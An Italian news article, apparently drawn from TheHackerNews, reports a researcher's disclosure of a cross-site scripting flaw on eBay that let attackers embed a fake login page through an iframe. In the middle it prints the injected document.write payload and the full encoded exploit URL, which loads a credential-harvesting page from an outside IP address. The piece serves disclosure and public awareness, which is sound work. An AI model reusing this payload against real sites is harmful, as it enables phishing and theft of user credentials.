Ebay, un semplice bug consente di prendere il controllo delle password

Ebay è vulnerabile agli attacchi dovuti ad un bug di programmazione della piattaforma online di e-commerce più conosciuta ed apprezzata al mondo. Un difetto tanto semplice quanto letale.

Ebay sotto attacco hacker grazie ad un bug

Centinaia di milioni di utenti possono immediatamente subire i funesti attacchi dei pirati informatici attivando un virus che si propaga grazie ad un bug basato su attivazione phishing.

Un ricercatore indipendente ha scoperto la vulnerabilità già il mese scorso. Difetto che è stato sfruttato per la creazione di una pagina Ebay falsa che ospitava una sessione di login fasulla voluta al solo scopo di estorcere le credenziali di accesso dei malcapitati.eBay

Così facendo i dati di accesso di milioni di utenti sono sottoposti a serio rischio. Il sito web-phishing così creato costituisce di fatto non solo una grave violazione della privacy ma anche una seria compromissione del proprio profilo in termini di acquisti e dati provenienti da carte di credito e conti bancari ad esso associati.

Il ricercatore ha fatto così sapere che il danno sarebbe stato di proporzioni gigantesche e che le mail phishing avrebbero causato non pochi danni visto che, almeno in apparenza, apparivano di lecita provenienza.

Un post ufficiale rilasciato sul loro blog questo lunedì, ha messo in luce la facilità con cui è possibile ricreare le condizioni ideali per un simile attacco.

Attacco Ebay, come funziona

Il difetto consta di un bug utilizzato per insediare un iFrame nella pagina ufficiale di Ebay attraverso la risorsa URL. Un difetto di progettazione comune che va sotto il nome di cross-site scripting (XSS) attraverso cui gli aggressori possono sfruttare la vulnerabilità di iniettare le linee di codice maligno in un sito web legittimo.Ebay-Bug

Il ricercatore è riuscito a ricreare la condizione insediando la risorsa nel legittimo sito che lo ha ospitato senza nulla ribattere.

La pagina di login era apparentemente identica se non per la parte secondaria dell’URL personalizzato che sfugge anche agli osservatori più attenti. In questo caso MLT, com’è soprannominato il ricercatore, ha utilizzato il codice:

document.write (‘<iframec = “http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html” width =” 1500 “height =” 1000 “>’) 

Insediandolo nel’URL che appariva nella forma codificata di :

http://ebay.com/link/?nav=webview& url=javascript:document.write%28%27%3Ciframe%20src=%22http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html%22%20width=%221500%22%20height=%221000%22%3E%27%29

Ed ecco il risultato finale ottenuto dallo screenshot:

Ebay-Fake-Login

Dopo aver creato l’iFrame all’interno del sito web Ebay ha provato ad immettere i dati che hanno restituito un errore. Il login non è avvenuto ma la digitazione in chiaro è apparsa al ricercatore.

Ecco un video dimostrativo del lavoro svolto:

La falla è stata segnalata ad Ebay già l’11 dicembre scorso ma l’azienda si è avvalsa della facoltà di non rispondere alle email inviate anche nei giorni successivi alla notifica ufficiale. Nessuna patch correttiva è stata rilasciata sino al momento delle richieste ufficiali di chiarimento da parte dei media.

Condividete la notizia sui social network. Fonte: TheHackerNews